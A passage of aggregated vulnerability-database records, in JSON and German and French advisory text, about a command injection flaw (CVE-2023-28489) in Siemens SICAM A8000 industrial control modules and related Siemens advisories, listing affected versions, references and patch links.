"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Patch for Siemens SICAM A8000 Command Injection Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/419121"
},
{
"title": "Siemens SICAM A8000 Fixes for command injection vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=233074"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2023-29699"
},
{
"db": "CNNVD",
"id": "CNNVD-202304-721"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-77",
"trust": 1.0
},
{
"problemtype": "Command injection (CWE-77) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-006563"
},
{
"db": "NVD",
"id": "CVE-2023-28489"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "http://packetstormsecurity.com/files/173370/siemens-a8000-cp-8050-cp-8031-code-execution-command-injection.html"
},
{
"trust": 2.4,
"url": "http://seclists.org/fulldisclosure/2023/jul/14"
},
{
"trust": 2.4,
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-472454.pdf"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-28489"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu94715153/"
},
{
"trust": 0.8,
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-23-103-07"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2023-28489/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.2157"
},
{
"trust": 0.1,
"url": "https://sec-consult.com/vulnerability-lab/"
},
{
"trust": 0.1,
"url": "https://sec-consult.com/career/"
},
{
"trust": 0.1,
"url": "https://www.siemens.com"
},
{
"trust": 0.1,
"url": "https://support.industry.siemens.com/cs/ww/en/view/109804985/)"
},
{
"trust": 0.1,
"url": "https://cert-portal.siemens.com/productcert/html/ssa-472454.html"
},
{
"trust": 0.1,
"url": "http://[host]"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-33921"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-33920"
},
{
"trust": 0.1,
"url": "https://cert-portal.siemens.com/productcert/html/ssa-731916.html"
},
{
"trust": 0.1,
"url": "https://www.sec-consult.com"
},
{
"trust": 0.1,
"url": "https://sec-consult.com/contact/"
},
{
"trust": 0.1,
"url": "http://[host]/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-33919"
},
{
"trust": 0.1,
"url": "https://new.siemens.com/global/en/company/about.html"
},
{
"trust": 0.1,
"url": "https://twitter.com/sec_consult"
},
{
"trust": 0.1,
"url": "http://blog.sec-consult.com"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2023-29699"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-006563"
},
{
"db": "PACKETSTORM",
"id": "173370"
},
{
"db": "NVD",
"id": "CVE-2023-28489"
},
{
"db": "CNNVD",
"id": "CNNVD-202304-721"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2023-29699"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-006563"
},
{
"db": "PACKETSTORM",
"id": "173370"
},
{
"db": "NVD",
"id": "CVE-2023-28489"
},
{
"db": "CNNVD",
"id": "CNNVD-202304-721"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-04-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2023-29699"
},
{
"date": "2023-11-15T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2023-006563"
},
{
"date": "2023-07-11T15:36:23",
"db": "PACKETSTORM",
"id": "173370"
},
{
"date": "2023-04-11T10:15:18.280000",
"db": "NVD",
"id": "CVE-2023-28489"
},
{
"date": "2023-04-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202304-721"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-04-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2023-29699"
},
{
"date": "2023-11-15T05:40:00",
"db": "JVNDB",
"id": "JVNDB-2023-006563"
},
{
"date": "2023-07-11T18:15:12.383000",
"db": "NVD",
"id": "CVE-2023-28489"
},
{
"date": "2023-07-12T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202304-721"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "173370"
},
{
"db": "CNNVD",
"id": "CNNVD-202304-721"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Siemens SICAM A8000 Command Injection Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2023-29699"
},
{
"db": "CNNVD",
"id": "CNNVD-202304-721"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "command injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202304-721"
}
],
"trust": 0.6
}
}
WID-SEC-W-2023-0908
Vulnerability from csaf_certbund - Published: 2023-04-10 22:00 - Updated: 2023-04-10 22:00Summary
Siemens SICAM A8000 Geräte: Schwachstelle ermöglicht Codeausführung
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung
Siemens SICAM ist eine Produktfamilie von SCADA-Systemen für den Betrieb von industriellen Prozessen.
Angriff
Ein entfernter, anonymer Angreifer kann eine Schwachstelle in Siemens SICAM A8000 Geräten ausnutzen, um beliebigen Programmcode auszuführen.
Betroffene Betriebssysteme
- Appliance
{
"document": {
"aggregate_severity": {
"text": "hoch"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "Siemens SICAM ist eine Produktfamilie von SCADA-Systemen f\u00fcr den Betrieb von industriellen Prozessen.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein entfernter, anonymer Angreifer kann eine Schwachstelle in Siemens SICAM A8000 Ger\u00e4ten ausnutzen, um beliebigen Programmcode auszuf\u00fchren.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Appliance",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2023-0908 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2023/wid-sec-w-2023-0908.json"
},
{
"category": "self",
"summary": "WID-SEC-2023-0908 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2023-0908"
},
{
"category": "external",
"summary": "Siemens Security Advisory vom 2023-04-10",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-472454.html"
}
],
"source_lang": "en-US",
"title": "Siemens SICAM A8000 Ger\u00e4te: Schwachstelle erm\u00f6glicht Codeausf\u00fchrung",
"tracking": {
"current_release_date": "2023-04-10T22:00:00.000+00:00",
"generator": {
"date": "2024-08-15T17:48:25.395+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.3.5"
}
},
"id": "WID-SEC-W-2023-0908",
"initial_release_date": "2023-04-10T22:00:00.000+00:00",
"revision_history": [
{
"date": "2023-04-10T22:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Siemens SICAM A8000 \u003c CP-8031_CPCI85 V05",
"product": {
"name": "Siemens SICAM A8000 \u003c CP-8031_CPCI85 V05",
"product_id": "T027144",
"product_identification_helper": {
"cpe": "cpe:/h:siemens:sicam:a8000_cp-8031_cpci85_v05"
}
}
},
{
"category": "product_name",
"name": "Siemens SICAM A8000 \u003c CP-8050_CPCI85 V05",
"product": {
"name": "Siemens SICAM A8000 \u003c CP-8050_CPCI85 V05",
"product_id": "T027145",
"product_identification_helper": {
"cpe": "cpe:/h:siemens:sicam:a8000_cp-8050_cpci85_v05"
}
}
}
],
"category": "product_name",
"name": "SICAM"
}
],
"category": "vendor",
"name": "Siemens"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-28489",
"notes": [
{
"category": "description",
"text": "Eine Schwachstelle f\u00fcr die Einschleusung von Befehlen besteht in mehreren Firmware-Versionen von Siemens SICAM A8000-Ger\u00e4ten. Die Ger\u00e4te sind \u00fcber den Webserver-Port 443/tcp verwundbar, wenn der Parameter \"Remote Operation\" aktiviert ist, der standardm\u00e4\u00dfig deaktiviert ist. Ein entfernter, anonymer Angreifer kann diese Schwachstelle ausnutzen, um beliebigen Programmcode auszuf\u00fchren."
}
],
"release_date": "2023-04-10T22:00:00.000+00:00",
"title": "CVE-2023-28489"
}
]
}
CERTFR-2023-AVI-0298
Vulnerability from certfr_avis - Published: - Updated:
De multiples vulnérabilités ont été découvertes dans les produits Siemens. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et un contournement de la politique de sécurité.
Solution
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
NoneImpacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| Siemens | N/A | Solid Edge SE2023 avec KeyShot 11 versions antérieures à V2023.1 | ||
| Siemens | N/A | TIA Portal V18 versions antérieures à V18 Update 1 | ||
| Siemens | N/A | TeleControl Server Basic V3 | ||
| Siemens | N/A | Polarion ALM versions antérieures à V2304.0 | ||
| Siemens | N/A | CP-8031 MASTER MODULE (6MF2803-1AA00) et CP-8050 MASTER MODULE (6MF2805-0AA00) versions antérieures à CPCI85 V05 | ||
| Siemens | N/A | TIA Portal V15, V16 et V17 | ||
| Siemens | N/A | JT2Go versions antérieures à V14.2.0.2 | ||
| Siemens | N/A | De nombreuses références SIPROTEC, SCALANCE, SIMATIC et SIPLUS, se référer aux bulletins de sécurité de l'éditeur pour la liste complète | ||
| Siemens | N/A | SIMATIC S7-400 PN/DP CPU family | ||
| Siemens | N/A | Teamcenter Visualization V13.2 versions antérieures à V13.2.0.13 | ||
| Siemens | N/A | Mendix Forgot Password (Mendix 8 compatible) versions antérieures à V4.1.1 | ||
| Siemens | N/A | Mendix Forgot Password (Mendix 9 compatible) versions antérieures à V5.1.1 | ||
| Siemens | N/A | SIMATIC CP 443-1 Advanced versions antérieures à V3.2.17 | ||
| Siemens | N/A | SIMATIC CP 343-1 Advanced versions antérieures à V3.0.53 | ||
| Siemens | N/A | Teamcenter Visualization V14.0 versions antérieures à V14.0.0.5 | ||
| Siemens | N/A | SCALANCE XCM332 (6GK5332-0GA01-2AC2) versions antérieures à V2.2 | ||
| Siemens | N/A | JT Open versions antérieures à V11.3.2.0 | ||
| Siemens | N/A | Teamcenter Visualization V14.2 versions antérieures à V14.2.0.2 | ||
| Siemens | N/A | Mendix Forgot Password (Mendix 7 compatible) versions antérieures à V3.7.1 | ||
| Siemens | N/A | JT Utilities versions antérieures à V13.3.0.0 | ||
| Siemens | N/A | Teamcenter Visualization V13.3 versions antérieures à V13.3.0.9 | ||
| Siemens | N/A | OpenPCS 7 V9.1 | ||
| Siemens | N/A | SIMATIC S7-300 CPU family versions antérieures à V3.X.18 | ||
| Siemens | N/A | Teamcenter Visualization V14.1 versions antérieures à V14.1.0.7 |
References
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Solid Edge SE2023 avec KeyShot 11 versions ant\u00e9rieures \u00e0 V2023.1",
"product": {
"name": "N/A",
"vendor": {
"name": "Siemens",
"scada": true
}
}
},
{
"description": "TIA Portal V18 versions ant\u00e9rieures \u00e0 V18 Update 1",
"product": {
"name": "N/A",
"vendor": {
"name": "Siemens",
"scada": true
}
}
},
{
"description": "TeleControl Server Basic V3",
"product": {
"name": "N/A",
"vendor": {
"name": "Siemens",
"scada": true
}
}
},
{
"description": "Polarion ALM versions ant\u00e9rieures \u00e0 V2304.0",
"product": {
"name": "N/A",
"vendor": {
"name": "Siemens",
"scada": true
}
}
},
{
"description": "CP-8031 MASTER MODULE (6MF2803-1AA00) et CP-8050 MASTER MODULE (6MF2805-0AA00) versions ant\u00e9rieures \u00e0 CPCI85 V05",
"product": {
"name": "N/A",
"vendor": {
"name": "Siemens",
"scada": true
}
}
},
{
"description": "TIA Portal V15, V16 et V17",
"product": {
"name": "N/A",
"vendor": {
"name": "Siemens",
"scada": true
}
}
},
{
"description": "JT2Go versions ant\u00e9rieures \u00e0 V14.2.0.2",
"product": {
"name": "N/A",
"vendor": {
"name": "Siemens",
"scada": true
}
}
},
{
"description": "De nombreuses r\u00e9f\u00e9rences SIPROTEC, SCALANCE, SIMATIC et SIPLUS, se r\u00e9f\u00e9rer aux bulletins de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour la liste compl\u00e8te",
"product": {
"name": "N/A",
"vendor": {
"name": "Siemens",
"scada": true
}
}
},
{
"description": "SIMATIC S7-400 PN/DP CPU family",
"product": {
"name": "N/A",
"vendor": {
"name": "Siemens",
"scada": true
}
}
},
{
"description": "Teamcenter Visualization V13.2 versions ant\u00e9rieures \u00e0 V13.2.0.13",
"product": {
"name": "N/A",
"vendor": {
"name": "Siemens",
"scada": true
}
}
},
{
"description": "Mendix Forgot Password (Mendix 8 compatible) versions ant\u00e9rieures \u00e0 V4.1.1",
"product": {
"name": "N/A",
"vendor": {
"name": "Siemens",
"scada": true
}
}
},
{
"description": "Mendix Forgot Password (Mendix 9 compatible) versions ant\u00e9rieures \u00e0 V5.1.1",
"product": {
"name": "N/A",
"vendor": {
"name": "Siemens",
"scada": true
}
}
},
{
"description": "SIMATIC CP 443-1 Advanced versions ant\u00e9rieures \u00e0 V3.2.17",
"product": {
"name": "N/A",
"vendor": {
"name": "Siemens",
"scada": true
}
}
},
{
"description": "SIMATIC CP 343-1 Advanced versions ant\u00e9rieures \u00e0 V3.0.53",
"product": {
"name": "N/A",
"vendor": {
"name": "Siemens",
"scada": true
}
}
},
{
"description": "Teamcenter Visualization V14.0 versions ant\u00e9rieures \u00e0 V14.0.0.5",
"product": {
"name": "N/A",
"vendor": {
"name": "Siemens",
"scada": true
}
}
},
{
"description": "SCALANCE XCM332 (6GK5332-0GA01-2AC2) versions ant\u00e9rieures \u00e0 V2.2",
"product": {
"name": "N/A",
"vendor": {
"name": "Siemens",
"scada": true
}
}
},
{
"description": "JT Open versions ant\u00e9rieures \u00e0 V11.3.2.0",
"product": {
"name": "N/A",
"vendor": {
"name": "Siemens",
"scada": true
}
}
},
{
"description": "Teamcenter Visualization V14.2 versions ant\u00e9rieures \u00e0 V14.2.0.2",
"product": {
"name": "N/A",
"vendor": {
"name": "Siemens",
"scada": true
}
}
},
{
"description": "Mendix Forgot Password (Mendix 7 compatible) versions ant\u00e9rieures \u00e0 V3.7.1",
"product": {
"name": "N/A",
"vendor": {
"name": "Siemens",
"scada": true
}
}
},
{
"description": "JT Utilities versions ant\u00e9rieures \u00e0 V13.3.0.0",
"product": {
"name": "N/A",
"vendor": {
"name": "Siemens",
"scada": true
}
}
},
{
"description": "Teamcenter Visualization V13.3 versions ant\u00e9rieures \u00e0 V13.3.0.9",
"product": {
"name": "N/A",
"vendor": {
"name": "Siemens",
"scada": true
}
}
},
{
"description": "OpenPCS 7 V9.1",
"product": {
"name": "N/A",
"vendor": {
"name": "Siemens",
"scada": true
}
}
},
{
"description": "SIMATIC S7-300 CPU family versions ant\u00e9rieures \u00e0 V3.X.18",
"product": {
"name": "N/A",
"vendor": {
"name": "Siemens",
"scada": true
}
}
},
{
"description": "Teamcenter Visualization V14.1 versions ant\u00e9rieures \u00e0 V14.1.0.7",
"product": {
"name": "N/A",
"vendor": {
"name": "Siemens",
"scada": true
}
}
}
],
"affected_systems_content": null,
"content": "## Solution\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des\ncorrectifs (cf. section Documentation).\n",
"cves": [
{
"name": "CVE-2022-35252",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-35252"
},
{
"name": "CVE-2023-28828",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-28828"
},
{
"name": "CVE-2016-8673",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-8673"
},
{
"name": "CVE-2020-35198",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-35198"
},
{
"name": "CVE-2022-32208",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-32208"
},
{
"name": "CVE-2023-28766",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-28766"
},
{
"name": "CVE-2021-27044",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-27044"
},
{
"name": "CVE-2022-1652",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1652"
},
{
"name": "CVE-2022-32207",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-32207"
},
{
"name": "CVE-2023-29053",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29053"
},
{
"name": "CVE-2023-28489",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-28489"
},
{
"name": "CVE-2022-43767",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-43767"
},
{
"name": "CVE-2022-44725",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-44725"
},
{
"name": "CVE-2023-29054",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29054"
},
{
"name": "CVE-2023-23588",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-23588"
},
{
"name": "CVE-2021-46828",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-46828"
},
{
"name": "CVE-2016-8672",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-8672"
},
{
"name": "CVE-2023-26293",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-26293"
},
{
"name": "CVE-2022-40674",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-40674"
},
{
"name": "CVE-2022-43716",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-43716"
},
{
"name": "CVE-2022-32205",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-32205"
},
{
"name": "CVE-2022-32206",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-32206"
},
{
"name": "CVE-2022-1729",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1729"
},
{
"name": "CVE-2022-43768",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-43768"
},
{
"name": "CVE-2023-27464",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-27464"
},
{
"name": "CVE-2020-28895",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-28895"
},
{
"name": "CVE-2023-1709",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1709"
},
{
"name": "CVE-2022-30065",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-30065"
}
],
"links": [],
"reference": "CERTFR-2023-AVI-0298",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2023-04-11T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "\u00c9l\u00e9vation de privil\u00e8ges"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits\nSiemens. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer\nune ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de service \u00e0\ndistance et un contournement de la politique de s\u00e9curit\u00e9.\n",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits Siemens",
"vendor_advisories": [
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Siemens ssa-699404 du 11 avril 2023",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-699404.html"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Siemens ssa-479249 du 11 avril 2023",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-479249.html"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Siemens ssa-572164 du 11 avril 2023",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-572164.html"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Siemens ssa-691715 du 11 avril 2023",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-691715.html"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Siemens ssa-511182 du 11 avril 2023",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-511182.html"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Siemens ssa-566905 du 11 avril 2023",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-566905.html"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Siemens ssa-642810 du 11 avril 2023",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-642810.html"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Siemens ssa-603476 du 11 avril 2023",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-603476.html"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Siemens ssa-813746 du 11 avril 2023",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-813746.html"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Siemens ssa-629917 du 11 avril 2023",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-629917.html"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Siemens ssa-558014 du 11 avril 2023",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-558014.html"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Siemens ssa-322980 du 11 avril 2023",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-322980.html"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Siemens ssa-116924 du 11 avril 2023",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-116924.html"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Siemens ssa-632164 du 11 avril 2023",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-632164.html"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Siemens ssa-472454 du 11 avril 2023",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-472454.html"
}
]
}
CERTFR-2023-AVI-0298
Vulnerability from certfr_avis - Published: - Updated:
De multiples vulnérabilités ont été découvertes dans les produits Siemens. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et un contournement de la politique de sécurité.
Solution
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
NoneImpacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| Siemens | N/A | Solid Edge SE2023 avec KeyShot 11 versions antérieures à V2023.1 | ||
| Siemens | N/A | TIA Portal V18 versions antérieures à V18 Update 1 | ||
| Siemens | N/A | TeleControl Server Basic V3 | ||
| Siemens | N/A | Polarion ALM versions antérieures à V2304.0 | ||
| Siemens | N/A | CP-8031 MASTER MODULE (6MF2803-1AA00) et CP-8050 MASTER MODULE (6MF2805-0AA00) versions antérieures à CPCI85 V05 | ||
| Siemens | N/A | TIA Portal V15, V16 et V17 | ||
| Siemens | N/A | JT2Go versions antérieures à V14.2.0.2 | ||
| Siemens | N/A | De nombreuses références SIPROTEC, SCALANCE, SIMATIC et SIPLUS, se référer aux bulletins de sécurité de l'éditeur pour la liste complète | ||
| Siemens | N/A | SIMATIC S7-400 PN/DP CPU family | ||
| Siemens | N/A | Teamcenter Visualization V13.2 versions antérieures à V13.2.0.13 | ||
| Siemens | N/A | Mendix Forgot Password (Mendix 8 compatible) versions antérieures à V4.1.1 | ||
| Siemens | N/A | Mendix Forgot Password (Mendix 9 compatible) versions antérieures à V5.1.1 | ||
| Siemens | N/A | SIMATIC CP 443-1 Advanced versions antérieures à V3.2.17 | ||
| Siemens | N/A | SIMATIC CP 343-1 Advanced versions antérieures à V3.0.53 | ||
| Siemens | N/A | Teamcenter Visualization V14.0 versions antérieures à V14.0.0.5 | ||
| Siemens | N/A | SCALANCE XCM332 (6GK5332-0GA01-2AC2) versions antérieures à V2.2 | ||
| Siemens | N/A | JT Open versions antérieures à V11.3.2.0 | ||
| Siemens | N/A | Teamcenter Visualization V14.2 versions antérieures à V14.2.0.2 | ||
| Siemens | N/A | Mendix Forgot Password (Mendix 7 compatible) versions antérieures à V3.7.1 | ||
| Siemens | N/A | JT Utilities versions antérieures à V13.3.0.0 | ||
| Siemens | N/A | Teamcenter Visualization V13.3 versions antérieures à V13.3.0.9 | ||
| Siemens | N/A | OpenPCS 7 V9.1 | ||
| Siemens | N/A | SIMATIC S7-300 CPU family versions antérieures à V3.X.18 | ||
| Siemens | N/A | Teamcenter Visualization V14.1 versions antérieures à V14.1.0.7 |
References
| Title | Publication Time | Tags | |||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Solid Edge SE2023 avec KeyShot 11 versions ant\u00e9rieures \u00e0 V2023.1",
"product": {
"name": "N/A",
"vendor": {
"name": "Siemens",
"scada": true
}
}
},
{
"description": "TIA Portal V18 versions ant\u00e9rieures \u00e0 V18 Update 1",
"product": {
"name": "N/A",
"vendor": {
"name": "Siemens",
"scada": true
}
}
},
{
"description": "TeleControl Server Basic V3",
"product": {
"name": "N/A",
"vendor": {
"name": "Siemens",
"scada": true
}
}
},
{
"description": "Polarion ALM versions ant\u00e9rieures \u00e0 V2304.0",
"product": {
"name": "N/A",
"vendor": {
"name": "Siemens",
"scada": true
}
}
},
{
"description": "CP-8031 MASTER MODULE (6MF2803-1AA00) et CP-8050 MASTER MODULE (6MF2805-0AA00) versions ant\u00e9rieures \u00e0 CPCI85 V05",
"product": {
"name": "N/A",
"vendor": {
"name": "Siemens",
"scada": true
}
}
},
{
"description": "TIA Portal V15, V16 et V17",
"product": {
"name": "N/A",
"vendor": {
"name": "Siemens",
"scada": true
}
}
},
{
"description": "JT2Go versions ant\u00e9rieures \u00e0 V14.2.0.2",
"product": {
"name": "N/A",
"vendor": {
"name": "Siemens",
"scada": true
}
}
},
{
"description": "De nombreuses r\u00e9f\u00e9rences SIPROTEC, SCALANCE, SIMATIC et SIPLUS, se r\u00e9f\u00e9rer aux bulletins de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour la liste compl\u00e8te",
"product": {
"name": "N/A",
"vendor": {
"name": "Siemens",
"scada": true
}
}
},
{
"description": "SIMATIC S7-400 PN/DP CPU family",
"product": {
"name": "N/A",
"vendor": {
"name": "Siemens",
"scada": true
}
}
},
{
"description": "Teamcenter Visualization V13.2 versions ant\u00e9rieures \u00e0 V13.2.0.13",
"product": {
"name": "N/A",
"vendor": {
"name": "Siemens",
"scada": true
}
}
},
{
"description": "Mendix Forgot Password (Mendix 8 compatible) versions ant\u00e9rieures \u00e0 V4.1.1",
"product": {
"name": "N/A",
"vendor": {
"name": "Siemens",
"scada": true
}
}
},
{
"description": "Mendix Forgot Password (Mendix 9 compatible) versions ant\u00e9rieures \u00e0 V5.1.1",
"product": {
"name": "N/A",
"vendor": {
"name": "Siemens",
